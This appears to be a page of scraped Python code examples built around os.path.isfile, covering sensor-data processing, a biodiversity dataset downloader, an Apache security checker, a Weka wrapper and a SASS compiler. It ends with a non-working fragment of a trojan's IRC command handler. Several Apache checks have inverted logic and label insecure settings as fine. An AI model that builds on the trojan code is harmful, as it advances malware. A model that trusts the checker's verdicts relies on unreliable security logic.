# assume it's in B1....deal with the special case later:
gapAB1 = round(t0_int - A0_int + (t0_frac - A0_frac )*1e-6,5)
no_samplesAB1 = int(gapAB1 * 1e6) /2000 + 1
print '\ntake the last {0} samples from {1}'.format(no_samplesAB1,fileB1)
gapAB2 = round(A1_int - t1_int + (A1_frac - t1_frac )*1e-6,5)
no_samplesAB2 = int(gapAB2 * 1e6) /2000 +1
print 'take {0} samples from gap'.format(len(bridge_data))
print 'take the first {0} samples from {1}'.format(no_samplesAB2,fileB2)
print '(total samples: {0})'.format(no_samplesAB1+len(bridge_data)+no_samplesAB2)
print
#sys.exit()
dataOut = np.zeros((no_samplesA,4),np.float32)
#pid = os.fork()
#if pid > 0:
# child = pid
# print 'reading file B1 ... (parent)'
samples2skip = no_samplesB1-no_samplesAB1 +1
counter = 0
idx = 0
for line in open(fileB1):# in enumerate(tail(fileB1,no_samplesAB1)):
counter += 1
if counter <= samples2skip:
continue
val = line.strip().split()
try:
dataOut[idx] = np.array([float(val[0]),float(val[1]),float(val[2]),float(val[3])])
if idx == 0 :
#print val
pass
except:
print val,idx,samples2skip
print np.array([float(val[0]),float(val[1]),float(val[2]),float(val[3]),np.float64(val[4]) ])
sys.exit()
idx += 1
print val
#sys.exit()
#assume end is in B2
print 'interpolating gap ... '
dataOut[no_samplesAB1:no_samplesAB1+len(bridge_data)] = bridge_data
# print ' waiting for child 1'
# os.waitpid(child, 0)
#else:
B2data = np.zeros((no_samplesAB2,4),np.float32)
print 'reading file data B2/C2 ... ({0})'.format(os.getpid())
idx = 0
for line in open(fileB2):#idx,val in enumerate(GetFirstLine(fileB2,no_samplesAB2)):
val = line.strip().split()
if idx ==0:
#print val
pass
B2data[idx] = np.array([float(val[0]),float(val[1]),float(val[2]),float(val[3]) ])
idx+= 1
if idx == no_samplesAB2:
#print val
break
dataOut[-no_samplesAB2:] = B2data
for idx_c, ch in enumerate(lo_channels[:-1]):
if idx_c in channels:
print 'pid ({0})'.format(os.getpid()), idx_c,ch
fnB = '{0}.{1}'.format(filebase,ch)
data = (dataOut[:,idx_c])
#data = detrend_linear(dataOut[:,idx_c])
with open(fnB,'w') as F:
for d in data:
if d%1 == 0:
F.write('{0}\n'.format(int(d)))
else:
F.write('{0:.10f}\n'.format(d))
#F.write('{0:.2f}\n'.format(d))
print 'file {0} done'.format(fnB)
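This example imports os.path as op and uses op.isfile() to decide, per boundary file, whether start and end timestamps can be read at all; a missing file is simply treated as None and bridged by interpolation later. A short sketch of that optional-input pattern, with plain file reads standing in for the GetFirstLine/tail helpers:

import os.path as op

def first_and_last_timestamp(path):
    # Return (start, end) when the file exists and has data, or None otherwise,
    # so the caller can interpolate across a missing segment instead of failing.
    if not op.isfile(path):
        return None
    with open(path) as f:
        lines = f.read().splitlines()
    if not lines:
        return None
    start = float(lines[0].split()[-1])
    end = float(lines[-1].split()[-1])
    return start, end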
0
Example 69
Project: retriever Source File: vertnet.py
def download(self, engine=None, debug=False):
Script.download(self, engine, debug)
engine = self.engine
file_names = [ ('vertnet_latest_amphibians.csv','amphibians'),
('vertnet_latest_birds.csv','birds'),
('vertnet_latest_fishes.csv','fishes'),
('vertnet_latest_mammals.csv','mammals'),
('vertnet_latest_reptiles.csv','reptiles')
]
for(filename,tablename) in file_names:
table = Table(str(tablename) , delimiter=',' )
# all tables in vertnet data have same field names
table.columns = [ ("record_id", ("pk-auto",)),
("beginrecord", ("char",)),
("icode", ("char",)),
("title", ("char",)),
("citation", ("char",)),
("contact", ("char",)),
("email", ("char",)),
("emlrights", ("char",)),
("gbifdatasetid", ("char",)),
("gbifpublisherid", ("char",)),
("doi", ("char",)),
("migrator", ("char",)),
("networks", ("char",)),
("orgcountry", ("char",)),
("orgname", ("char",)),
("orgstateprovince", ("char",)),
("pubdate", ("char",)),
("source_url", ("char",)),
("iptrecordid", ("char",)),
("associatedmedia", ("char",)),
("associatedoccurrences", ("char",)),
("associatedorganisms", ("char",)),
("associatedreferences", ("char",)),
("associatedsequences", ("char",)),
("associatedtaxa", ("char",)),
("bed", ("char",)),
("behavior", ("char",)),
("catalognumber", ("char",)),
("continent", ("char",)),
("coordinateprecision", ("char",)),
("coordinateuncertaintyinmeters", ("char",)),
("country", ("char",)),
("countrycode", ("char",)),
("county", ("char",)),
("dateidentified", ("char",)),
("day", ("char",)),
("decimallatitude", ("char",)),
("decimallongitude", ("char",)),
("disposition", ("char",)),
("earliestageorloweststage", ("char",)),
("earliesteonorlowesteonothem", ("char",)),
("earliestepochorlowestseries", ("char",)),
("earliesteraorlowesterathem", ("char",)),
("earliestperiodorlowestsystem", ("char",)),
("enddayofyear", ("char",)),
("establishmentmeans", ("char",)),
("eventdate", ("char",)),
("eventid", ("char",)),
("eventremarks", ("char",)),
("eventtime", ("char",)),
("fieldnotes", ("char",)),
("fieldnumber", ("char",)),
("footprintspatialfit", ("char",)),
("footprintsrs", ("char",)),
("footprintwkt", ("char",)),
("formation", ("char",)),
("geodeticdatum", ("char",)),
("geologicalcontextid", ("char",)),
("georeferencedby", ("char",)),
("georeferenceddate", ("char",)),
("georeferenceprotocol", ("char",)),
("georeferenceremarks", ("char",)),
("georeferencesources", ("char",)),
("georeferenceverificationstatus", ("char",)),
("group", ("char",)),
("habitat", ("char",)),
("highergeography", ("char",)),
("highergeographyid", ("char",)),
("highestbiostratigraphiczone", ("char",)),
("identificationid", ("char",)),
("identificationqualifier", ("char",)),
("identificationreferences", ("char",)),
("identificationremarks", ("char",)),
("identificationverificationstatus", ("char",)),
("identifiedby", ("char",)),
("individualcount", ("char",)),
("island", ("char",)),
("islandgroup", ("char",)),
("latestageorhigheststage", ("char",)),
("latesteonorhighesteonothem", ("char",)),
("latestepochorhighestseries", ("char",)),
("latesteraorhighesterathem", ("char",)),
("latestperiodorhighestsystem", ("char",)),
("lifestage", ("char",)),
("lithostratigraphicterms", ("char",)),
("locality", ("char",)),
("locationaccordingto", ("char",)),
("locationid", ("char",)),
("locationremarks", ("char",)),
("lowestbiostratigraphiczone", ("char",)),
("materialsampleid", ("char",)),
("maximumdepthinmeters", ("char",)),
("maximumdistanceabovesurfaceinmeters", ("char",)),
("maximumelevationinmeters", ("char",)),
("member", ("char",)),
("minimumdepthinmeters", ("char",)),
("minimumdistanceabovesurfaceinmeters", ("char",)),
("minimumelevationinmeters", ("char",)),
("month", ("char",)),
("municipality", ("char",)),
("occurrenceid", ("char",)),
("occurrenceremarks", ("char",)),
("occurrencestatus", ("char",)),
("organismid", ("char",)),
("organismname", ("char",)),
("organismremarks", ("char",)),
("organismscope", ("char",)),
("othercatalognumbers", ("char",)),
("pointradiusspatialfit", ("char",)),
("preparations", ("char",)),
("previousidentifications", ("char",)),
("recordedby", ("char",)),
("recordnumber", ("char",)),
("reproductivecondition", ("char",)),
("samplingeffort", ("char",)),
("samplingprotocol", ("char",)),
("sex", ("char",)),
("startdayofyear", ("char",)),
("stateprovince", ("char",)),
("typestatus", ("char",)),
("verbatimcoordinates", ("char",)),
("verbatimcoordinatesystem", ("char",)),
("verbatimdepth", ("char",)),
("verbatimelevation", ("char",)),
("verbatimeventdate", ("char",)),
("verbatimlatitude", ("char",)),
("verbatimlocality", ("char",)),
("verbatimlongitude", ("char",)),
("verbatimsrs", ("char",)),
("waterbody", ("char",)),
("year", ("char",)),
("dctype", ("char",)),
("modified", ("char",)),
("language", ("char",)),
("license", ("char",)),
("rightsholder", ("char",)),
("accessrights", ("char",)),
("bibliographiccitation", ("char",)),
("dc_references", ("char",)),
("institutionid", ("char",)),
("collectionid", ("char",)),
("datasetid", ("char",)),
("institutioncode", ("char",)),
("collectioncode", ("char",)),
("datasetname", ("char",)),
("ownerinstitutioncode", ("char",)),
("basisofrecord", ("char",)),
("informationwithheld", ("char",)),
("datageneralizations", ("char",)),
("dynamicproperties", ("char",)),
("scientificnameid", ("char",)),
("namepublishedinid", ("char",)),
("scientificname", ("char",)),
("acceptednameusage", ("char",)),
("originalnameusage", ("char",)),
("namepublishedin", ("char",)),
("namepublishedinyear", ("char",)),
("higherclassification", ("char",)),
("kingdom", ("char",)),
("phylum", ("char",)),
("class", ("char",)),
("order", ("char",)),
("family", ("char",)),
("genus", ("char",)),
("subgenus", ("char",)),
("specificepithet", ("char",)),
("infraspecificepithet", ("char",)),
("taxonrank", ("char",)),
("verbatimtaxonrank", ("char",)),
("scientificnameauthorship", ("char",)),
("vernacularname", ("char",)),
("nomenclaturalcode", ("char",)),
("taxonomicstatus", ("char",)),
("keyname", ("char",)),
("haslicense", ("int",)),
("vntype", ("char",)),
("rank", ("int",)),
("mappable", ("int",)),
("hashid", ("char",)),
("hastypestatus", ("int",)),
("wascaptive", ("int",)),
("wasinvasive", ("int",)),
("hastissue", ("int",)),
("hasmedia", ("int",)),
("isfossil", ("int",)),
("haslength", ("int",)),
("haslifestage", ("int",)),
("hasmass", ("int",)),
("hassex", ("int",)),
("lengthinmm", ("double",)),
("massing", ("double",)),
("lengthunitsinferred", ("char",)),
("massunitsinferred", ("char",)),
("underivedlifestage", ("char",)),
("underivedsex", ("char",))]
engine.table = table
engine.create_table()
if not os.path.isfile(engine.format_filename(filename)):
engine.download_files_from_archive(self.urls[tablename], [filename], filetype="zip", archivename="vertnet_latest_" + str(tablename))
engine.insert_data_from_file(engine.format_filename(str(filename)))
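The single isfile() call at the end of this script is a download guard: each VertNet archive is fetched and unpacked only when the expected CSV is not already in the data directory. A generic download-if-missing sketch using the standard library instead of the retriever engine:

import os.path
try:
    from urllib.request import urlretrieve   # Python 3
except ImportError:
    from urllib import urlretrieve            # Python 2

def fetch_if_missing(url, local_path):
    # Skip the network entirely when the file has already been downloaded.
    if not os.path.isfile(local_path):
        urlretrieve(url, local_path)
    return local_path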
0
Example 70
def analyze(self, options):
""" Analyze Apache config file searching for harmful settings"""
check_results = self.check_results
apache_conf_files = self.required_files
if options.apache_conf:
for f in options.apache_conf:
apache_conf_files.append(f)
apache_conf_file_found = False
for apache_conf in apache_conf_files:
if os.path.isfile(apache_conf):
apache_conf_file_found = True
fp = None
try:
fp = open(apache_conf, 'r')
except IOError, (errno, strerror):
check_results['info'].append(
'Could not open %s: %s' % (apache_conf, strerror)
)
continue
lines = [x.strip('\n') for x in fp.readlines()]
fp.close()
# Checking if ServerTokens is using harmful conf
if not 'ServerTokens Minimal' in lines:
check_results['ok'].append(
'ServerTokens is not using harmful conf'
)
else:
check_results['medium'].append(
'ServerTokens is using harmful conf (set Minimal)'
)
# Checking if KeepAlive is set to On
if 'KeepAlive On' in lines:
check_results['ok'].append(
'KeepAlive is not using harmful conf'
)
else:
check_results['medium'].append(
'KeepAlive is using harmful conf (set On)'
)
# Checking if ServerSignature is set to On
if 'ServerSignature Off' in lines:
check_results['ok'].append(
'ServerSignature is not using harmful conf'
)
else:
check_results['medium'].append(
'ServerSignature is using harmful conf (set Off)'
)
# Checking if LimitRequestBody is bigger than 0
if 'LimitRequestBody' in lines:
for line in lines:
if line.startswith('LimitRequestBody') is True:
piece = line.split(' ')
if int(piece[1]) == 0:
check_results['ok'].append(
'LimitRequestBody is not using harmful' +
' value (0)'
)
else:
check_results['medium'].append(
'LimitRequestBody is using harmful value' +
' (0)'
)
else:
check_results['ok'].append(
'LimitRequestBody is not using harmful value (0)'
)
# Checking if LimitRequestFields is bigger than 0
if 'LimitRequestFields' in lines:
for line in lines:
if line.startswith('LimitRequestFields') is True:
piece = line.split(' ')
if int(piece[1]) == 0:
check_results['ok'].append(
'LimitRequestFields is not using harmful' +
' value (0)'
)
else:
check_results['medium'].append(
'LimitRequestFields is using harmful' +
' value (0)'
)
else:
check_results['ok'].append(
'LimitRequestFields is not using harmful value (0)'
)
# Checking if LimitRequestFieldsize equals 8190
if 'LimitRequestFieldsize' in lines:
for line in lines:
if line.startswith('LimitRequestFieldsize') is True:
piece = line.split(' ')
if int(piece[1]) == 0:
check_results['ok'].append(
'LimitRequestFieldsize is using good' +
' value (8190)'
)
else:
check_results['low'].append(
'LimitRequestFieldsize is not using good' +
' value (8190)'
)
else:
check_results['ok'].append(
'LimitRequestFieldsize is using good value (8190)'
)
# Checking if LimitRequestLine equals 8190
if 'LimitRequestLine' in lines:
for line in lines:
if line.startswith('LimitRequestLine') is True:
piece = line.split(' ')
if int(piece[1]) == 0:
check_results['ok'].append(
'LimitRequestLine is using good value' +
' (8190)'
)
else:
check_results['low'].append(
'LimitRequestLine is not using good' +
' value (8190)'
)
else:
check_results['ok'].append(
'LimitRequestLine is using good value (8190)'
)
# Checking Timeout less than 300
tvalue = 300
for line in lines:
if line.startswith('Timeout') is True:
piece = line.split(' ')
if int(piece[1]) <= tvalue:
check_results['ok'].append(
'Timeout is not using harmful value (>=%s)'
% (tvalue)
)
else:
check_results['medium'].append(
'Timeout is using harmful value (>=%s)'
% (tvalue)
)
# Checking if access to Apache manual is enabled
for line in lines:
if line.startswith('Alias /manual/') is True:
piece = line.split(' ')
if (piece[1]) == '/manual/':
check_results['medium'].append(
'Access to Apache manual is enabled'
)
else:
check_results['ok'].append(
'Access to Apache manual is disabled'
)
# Checking .htpasswd files permission
mode = "550"
mode = int(mode, 8)
locate_status, locate_returns = \
commands.getstatusoutput('locate .htpasswd')
if locate_status == 0 and locate_returns:
for locate_return in locate_returns.split('\n'):
if not os.path.isfile(locate_return):
continue
if stat.S_IMODE(os.stat(locate_return).st_mode) == mode:
check_results['ok'].append(
'The file %s is not using harmful permission (550)'
% (locate_return)
)
else:
check_results['medium'].append(
'The file %s is not using recommended permission (550)'
% (locate_return)
)
else:
check_results['info'].append(
'Could not find a .htpasswd file. Please, run updatedb'
)
# Report if no Apache configuration file was found
if not apache_conf_file_found:
check_results['info'].append(
'Could not find Apache\'s configuration files'
)
return check_results
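The LimitRequest* checks above repeat the same split-and-compare pattern. As a hedged illustration (not part of the listed project), a small helper like the sketch below could extract a directive's numeric value from the already-read configuration lines:
def directive_value(lines, name, default=None):
    # Return the first integer value of an Apache directive from pre-read config lines.
    for line in lines:
        if line.startswith(name + ' '):
            try:
                return int(line.split(' ')[1])
            except (IndexError, ValueError):
                return default
    return default

# Example: a LimitRequestBody of 0 (unlimited) would be flagged as harmful.
# if directive_value(lines, 'LimitRequestBody', default=0) == 0: ...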
0
Example 71
Project: weka Source File: classifiers.py
def predict(self, query_data, verbose=False, distribution=False, cleanup=True):
"""
Iterates over the predicted values and probability (if supported).
Each iteration yields a tuple of the form (prediction, probability).
If the file is a test file (i.e. contains no query variables),
then the tuple will be of the form (prediction, actual).
See http://weka.wikispaces.com/Making+predictions
for further explanation on interpreting Weka prediction output.
"""
model_fn = None
query_fn = None
clean_query = False
stdout = None
try:
# Validate query data.
if isinstance(query_data, basestring):
assert os.path.isfile(query_data)
query_fn = query_data
else:
assert isinstance(query_data, arff.ArffFile)
fd, query_fn = tempfile.mkstemp(suffix='.arff')
os.close(fd)
open(query_fn, 'w').write(query_data.write())
clean_query = True
assert query_fn
# Validate model file.
fd, model_fn = tempfile.mkstemp()
os.close(fd)
assert self._model_data, \
"You must train this classifier before predicting."
fout = open(model_fn, 'wb')
fout.write(self._model_data)
fout.close()
# print(open(model_fn).read())
# print(open(query_fn).read())
# Call Weka Jar.
args = dict(
CP=CP,
classifier_name=self.name,
model_fn=model_fn,
query_fn=query_fn,
#ckargs = self._get_ckargs_str(),
distribution=('-distribution' if distribution else ''),
)
cmd = (
"java -cp %(CP)s %(classifier_name)s -p 0 %(distribution)s "
"-l \"%(model_fn)s\" -T \"%(query_fn)s\"") % args
if verbose:
print(cmd)
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=True)
stdin, stdout, stderr = (p.stdin, p.stdout, p.stderr)
stdout_str = stdout.read()
stderr_str = stderr.read()
if verbose:
print('stdout:')
print(stdout_str)
print('stderr:')
print(stderr_str)
if stderr_str:
raise PredictionError(stderr_str)
if stdout_str:
# inst# actual predicted error prediction
#header = 'inst,actual,predicted,error'.split(',')
query = arff.ArffFile.load(query_fn)
query_variables = [
query.attributes[i]
for i, v in enumerate(query.data[0])
if v == arff.MISSING]
if not query_variables:
query_variables = [query.attributes[-1]]
# assert query_variables, \
# "There must be at least one query variable in the query."
if verbose:
print('query_variables:', query_variables)
header = 'predicted'.split(',')
# sample line: 1 1:? 4:36 + 1
# Expected output without distribution:
#=== Predictions on test data ===
#
# inst# actual predicted error prediction
# 1 1:? 11:Acer_tr + 1
#=== Predictions on test data ===
#
# inst# actual predicted error
# 1 ? 7 ?
#=== Predictions on test data ===
#
# inst# actual predicted error prediction
# 1 1:? 1:0 0.99
# 2 1:? 1:0 0.99
# 3 1:? 1:0 0.99
# 4 1:? 1:0 0.99
# 5 1:? 1:0 0.99
# Expected output with distribution:
#=== Predictions on test data ===
#
# inst# actual predicted error distribution
# 1 1:? 11:Acer_tr + 0,0,0,0,0,0,0,0,0,0,*1,0,0,0,0,0...
q = re.findall(
r'J48 pruned tree\s+\-+:\s+([0-9]+)\s+',
stdout_str.decode('utf-8'), re.MULTILINE|re.DOTALL)
if q:
class_label = q[0]
prob = 1.0
yield PredictionResult(
actual=None,
predicted=class_label,
probability=prob,)
elif re.findall(r'error\s+(?:distribution|prediction)', stdout_str.decode('utf-8')):
# Check for distribution output.
matches = re.findall(
r"^\s*[0-9\.]+\s+[a-zA-Z0-9\.\?\:]+\s+(?P<cls_value>[a-zA-Z0-9_\.\?\:]+)"
r"\s+\+?\s+(?P<prob>[a-zA-Z0-9\.\?\,\*]+)",
stdout_str.decode('utf-8'),
re.MULTILINE)
assert matches, \
("No results found matching distribution pattern in stdout: %s") \
% stdout_str
for match in matches:
prediction, prob = match
class_index, class_label = prediction.split(':')
class_index = int(class_index)
if distribution:
# Convert list of probabilities into a hash linking the prob
# to the associated class value.
prob = dict(zip(
query.attribute_data[query.attributes[-1]],
map(float, prob.replace('*', '').split(','))))
else:
prob = float(prob)
class_label = query.attribute_data[query.attributes[-1]][class_index-1]
yield PredictionResult(
actual=None,
predicted=class_label,
probability=prob,)
else:
# Otherwise, assume a simple output.
matches = re.findall(
r"^\s*([0-9\.]+)\s+([a-zA-Z0-9\.\?\:]+)\s+([a-zA-Z0-9_\.\?\:]+)\s+",
stdout_str.decode('utf-8'),
re.MULTILINE)
assert matches, \
"No results found matching simple pattern in stdout: %s" % stdout_str
# print('matches:', len(matches))
for match in matches:
inst, actual, predicted = match
class_name = query.attributes[-1]
actual_value = query.get_attribute_value(class_name, actual)
predicted_value = query.get_attribute_value(class_name, predicted)
yield PredictionResult(
actual=actual_value,
predicted=predicted_value,
probability=None,)
finally:
# Cleanup files.
if cleanup:
if model_fn:
self._model_data = open(model_fn, 'rb').read()
os.remove(model_fn)
if query_fn and clean_query:
os.remove(query_fn)
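A minimal usage sketch for the generator above. The classifier instance `c` and the query filename are assumptions; only the iteration behaviour follows from the docstring and the PredictionResult tuples yielded here:
# Hypothetical: `c` is a trained classifier from this module, 'query.arff' a query file.
for result in c.predict('query.arff', verbose=False, distribution=False):
    # Each yielded item is a PredictionResult(actual, predicted, probability).
    print(result.predicted, result.probability)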
0
Example 72
def compile(**kwargs):
"""There are three modes of parameters :func:`compile()` can take:
``string``, ``filename``, and ``dirname``.
The ``string`` parameter is the most basic way to compile SASS.
It simply takes a string of SASS code, and then returns a compiled
CSS string.
:param string: SASS source code to compile. it's exclusive to
``filename`` and ``dirname`` parameters
:type string: :class:`str`
:param output_style: an optional coding style of the compiled result.
choose one of: ``'nested'`` (default), ``'expanded'``,
``'compact'``, ``'compressed'``
:type output_style: :class:`str`
:param source_comments: whether to add comments about source lines.
:const:`False` by default
:type source_comments: :class:`bool`
:param include_paths: an optional list of paths to find ``@import``\ ed
SASS/CSS source files
:type include_paths: :class:`collections.Sequence`, :class:`str`
:param precision: optional precision for numbers. :const:`5` by default.
:type precision: :class:`int`
:param custom_functions: optional mapping of custom functions.
see also below `custom functions
<custom-functions>`_ description
:type custom_functions: :class:`collections.Set`,
:class:`collections.Sequence`,
:class:`collections.Mapping`
:param indented: optional declaration that the string is SASS, not SCSS
formatted. :const:`False` by default
:type indented: :class:`bool`
:returns: the compiled CSS string
:param importers: optional callback functions.
see also below `importer callbacks
<importer-callbacks>`_ description
:type importers: :class:`collections.Callable`
:rtype: :class:`str`
:raises sass.CompileError: when it fails for any reason
(for example the given SASS has broken syntax)
The ``filename`` mode is the most commonly used way. It takes a SASS
filename as a string, and then returns a compiled CSS string.
:param filename: the filename of SASS source code to compile.
it's exclusive to ``string`` and ``dirname`` parameters
:type filename: :class:`str`
:param output_style: an optional coding style of the compiled result.
choose one of: ``'nested'`` (default), ``'expanded'``,
``'compact'``, ``'compressed'``
:type output_style: :class:`str`
:param source_comments: whether to add comments about source lines.
:const:`False` by default
:type source_comments: :class:`bool`
:param source_map_filename: use source maps and indicate the source map
output filename. :const:`None` means not
using source maps. :const:`None` by default.
:type source_map_filename: :class:`str`
:param include_paths: an optional list of paths to find ``@import``\ ed
SASS/CSS source files
:type include_paths: :class:`collections.Sequence`, :class:`str`
:param precision: optional precision for numbers. :const:`5` by default.
:type precision: :class:`int`
:param custom_functions: optional mapping of custom functions.
see also below `custom functions
<custom-functions>`_ description
:type custom_functions: :class:`collections.Set`,
:class:`collections.Sequence`,
:class:`collections.Mapping`
:param importers: optional callback functions.
see also below `importer callbacks
<importer-callbacks>`_ description
:type importers: :class:`collections.Callable`
:returns: the compiled CSS string, or a pair of the compiled CSS string
and the source map string if ``source_map_filename`` is set
:rtype: :class:`str`, :class:`tuple`
:raises sass.CompileError: when it fails for any reason
(for example the given SASS has broken syntax)
:raises exceptions.IOError: when the ``filename`` doesn't exist or
cannot be read
The ``dirname`` mode is useful for automation. It takes a pair of paths.
The first of the ``dirname`` pair refers to the source directory, which
contains the SASS source files to be compiled. SASS source files can be
nested in directories. The second of the pair refers to the output
directory where the compiled CSS files are saved. The directory tree
structure of the source directory is maintained in the output directory
as well. If the ``dirname`` parameter is used, the function returns
:const:`None`.
:param dirname: a pair of ``(source_dir, output_dir)``.
it's exclusive to ``string`` and ``filename``
parameters
:type dirname: :class:`tuple`
:param output_style: an optional coding style of the compiled result.
choose one of: ``'nested'`` (default), ``'expanded'``,
``'compact'``, ``'compressed'``
:type output_style: :class:`str`
:param source_comments: whether to add comments about source lines.
:const:`False` by default
:type source_comments: :class:`bool`
:param include_paths: an optional list of paths to find ``@import``\ ed
SASS/CSS source files
:type include_paths: :class:`collections.Sequence`, :class:`str`
:param precision: optional precision for numbers. :const:`5` by default.
:type precision: :class:`int`
:param custom_functions: optional mapping of custom functions.
see also below `custom functions
<custom-functions>`_ description
:type custom_functions: :class:`collections.Set`,
:class:`collections.Sequence`,
:class:`collections.Mapping`
:raises sass.CompileError: when it fails for any reason
(for example the given SASS has broken syntax)
.. _custom-functions:
The ``custom_functions`` parameter can take three types of forms:
:class:`~collections.Set`/:class:`~collections.Sequence` of \
:class:`SassFunction`\ s
It is the most general form. Although pretty verbose, it can take
any kind of callables like type objects, unnamed functions,
and user-defined callables.
.. code-block:: python
sass.compile(
...,
custom_functions={
sass.SassFunction('func-name', ('$a', '$b'), some_callable),
...
}
)
:class:`~collections.Mapping` of names to functions
A less general, but easier-to-use form. Although it cannot take
arbitrary callables, it can take any kind of *function* defined
using :keyword:`def`/:keyword:`lambda` syntax.
It cannot take other kinds of callables, since argument inspection
is not available for every kind of callable.
.. code-block:: python
sass.compile(
...,
custom_functions={
'func-name': lambda a, b: ...,
...
}
)
:class:`~collections.Set`/:class:`~collections.Sequence` of \
named functions
Not general, but the easiest-to-use form for *named* functions.
It can take only named functions, defined using :keyword:`def`.
It cannot take lambdas since names are unavailable for them.
.. code-block:: python
def func_name(a, b):
return ...
sass.compile(
...,
custom_functions={func_name}
)
.. _importer-callbacks:
Newer versions of ``libsass`` allow developers to define callbacks to be
called and given a chance to process ``@import`` directives. You can
define yours by passing in a list of callables via the ``importers``
parameter. The callables must be passed as 2-tuples in the form:
.. code-block:: python
(priority_int, callback_fn)
A priority of zero is acceptable; priority determines the order callbacks
are attempted.
These callbacks must accept a single string argument representing the path
passed to the ``@import`` directive, and either return ``None`` to
indicate the path wasn't handled by that callback (to continue with others
or fall back on internal ``libsass`` filesystem behaviour) or a list of
one or more tuples, each in one of three forms:
* A 1-tuple representing an alternate path to handle internally; or,
* A 2-tuple representing an alternate path and the content that path
represents; or,
* A 3-tuple representing the same as the 2-tuple with the addition of a
"sourcemap".
All tuple return values must be strings. As a not overly realistic
example:
.. code-block:: python
def my_importer(path):
return [(path, '#' + path + ' { color: red; }')]
sass.compile(
...,
importers=[(0, my_importer)]
)
Now, within the style source, attempting to ``@import 'button';`` will
instead attach ``color: red`` as a property of an element with the
imported name.
.. versionadded:: 0.4.0
Added ``source_comments`` and ``source_map_filename`` parameters.
.. versionchanged:: 0.6.0
The ``source_comments`` parameter now takes only :class:`bool`
instead of :class:`str`.
.. deprecated:: 0.6.0
Values like ``'none'``, ``'line_numbers'``, and ``'map'`` for
the ``source_comments`` parameter are deprecated.
.. versionadded:: 0.7.0
Added ``precision`` parameter.
.. versionadded:: 0.7.0
Added ``custom_functions`` parameter.
.. versionadded:: 0.11.0
``source_map_filename`` no longer implies ``source_comments``.
"""
modes = set()
for mode_name in MODES:
if mode_name in kwargs:
modes.add(mode_name)
if not modes:
raise TypeError('choose one at least in ' + and_join(MODES))
elif len(modes) > 1:
raise TypeError(and_join(modes) + ' are mutually exclusive; '
'only one can be used at a time')
precision = kwargs.pop('precision', 5)
output_style = kwargs.pop('output_style', 'nested')
if not isinstance(output_style, string_types):
raise TypeError('output_style must be a string, not ' +
repr(output_style))
try:
output_style = OUTPUT_STYLES[output_style]
except KeyError:
raise CompileError('{0} is unsupported output_style; choose one of {1}'
''.format(output_style, and_join(OUTPUT_STYLES)))
source_comments = kwargs.pop('source_comments', False)
if source_comments in SOURCE_COMMENTS:
if source_comments == 'none':
deprecation_message = ('you can simply pass False to '
"source_comments instead of 'none'")
source_comments = False
elif source_comments in ('line_numbers', 'default'):
deprecation_message = ('you can simply pass True to '
"source_comments instead of " +
repr(source_comments))
source_comments = True
else:
deprecation_message = ("you don't have to pass 'map' to "
'source_comments but just need to '
'specify source_map_filename')
source_comments = False
warnings.warn(
"values like 'none', 'line_numbers', and 'map' for "
'the source_comments parameter are deprecated; ' +
deprecation_message,
DeprecationWarning
)
if not isinstance(source_comments, bool):
raise TypeError('source_comments must be bool, not ' +
repr(source_comments))
fs_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
source_map_filename = kwargs.pop('source_map_filename', None)
if not (source_map_filename is None or
isinstance(source_map_filename, string_types)):
raise TypeError('source_map_filename must be a string, not ' +
repr(source_map_filename))
elif isinstance(source_map_filename, text_type):
source_map_filename = source_map_filename.encode(fs_encoding)
if not ('filename' in modes or source_map_filename is None):
raise CompileError('source_map_filename is only available with '
'filename= keyword argument since it has to be '
'aware of it')
try:
include_paths = kwargs.pop('include_paths') or b''
except KeyError:
include_paths = b''
else:
if isinstance(include_paths, collections.Sequence):
include_paths = os.pathsep.join(include_paths)
elif not isinstance(include_paths, string_types):
raise TypeError('include_paths must be a sequence of strings, or '
'a colon-separated (or semicolon-separated if '
'Windows) string, not ' + repr(include_paths))
if isinstance(include_paths, text_type):
include_paths = include_paths.encode(fs_encoding)
custom_functions = kwargs.pop('custom_functions', ())
if isinstance(custom_functions, collections.Mapping):
custom_functions = [
SassFunction.from_lambda(name, lambda_)
for name, lambda_ in custom_functions.items()
]
elif isinstance(custom_functions, (collections.Set, collections.Sequence)):
custom_functions = [
func if isinstance(func, SassFunction)
else SassFunction.from_named_function(func)
for func in custom_functions
]
else:
raise TypeError(
'custom_functions must be one of:\n'
'- a set/sequence of {0.__module__}.{0.__name__} objects,\n'
'- a mapping of function name strings to lambda functions,\n'
'- a set/sequence of named functions,\n'
'not {1!r}'.format(SassFunction, custom_functions)
)
importers = _validate_importers(kwargs.pop('importers', None))
if 'string' in modes:
string = kwargs.pop('string')
if isinstance(string, text_type):
string = string.encode('utf-8')
indented = kwargs.pop('indented', False)
if not isinstance(indented, bool):
raise TypeError('indented must be bool, not ' +
repr(indented))
_check_no_remaining_kwargs(compile, kwargs)
s, v = _sass.compile_string(
string, output_style, source_comments, include_paths, precision,
custom_functions, indented, importers,
)
if s:
return v.decode('utf-8')
elif 'filename' in modes:
filename = kwargs.pop('filename')
if not isinstance(filename, string_types):
raise TypeError('filename must be a string, not ' + repr(filename))
elif not os.path.isfile(filename):
raise IOError('{0!r} seems not a file'.format(filename))
elif isinstance(filename, text_type):
filename = filename.encode(fs_encoding)
_check_no_remaining_kwargs(compile, kwargs)
s, v, source_map = _sass.compile_filename(
filename, output_style, source_comments, include_paths, precision,
source_map_filename, custom_functions, importers,
)
if s:
v = v.decode('utf-8')
if source_map_filename:
source_map = source_map.decode('utf-8')
v = v, source_map
return v
elif 'dirname' in modes:
try:
search_path, output_path = kwargs.pop('dirname')
except ValueError:
raise ValueError('dirname must be a pair of (source_dir, '
'output_dir)')
_check_no_remaining_kwargs(compile, kwargs)
s, v = compile_dirname(
search_path, output_path, output_style, source_comments,
include_paths, precision, custom_functions, importers,
)
if s:
return
else:
raise TypeError('something went wrong')
assert not s
raise CompileError(v)
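A short usage sketch of the three modes documented in the docstring above; the file and directory paths are placeholders:
import sass

# string mode: returns the compiled CSS string
print(sass.compile(string='a { b { color: blue; } }'))

# filename mode: raises IOError if the file does not exist (checked with os.path.isfile)
css = sass.compile(filename='sass/main.scss', output_style='compressed')

# dirname mode: compiles a whole tree and returns None
sass.compile(dirname=('sass', 'css'), output_style='compressed')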
0
Example 73
Project: ZIB-Trojan Source File: intel.py
def handleCommands(r, s, output):
globals channels
globals conn
a = r.split(" ")[3].split(":")[1]
if a.startswith("!help"):
print "Handling HELP command for user: "+output+"..."
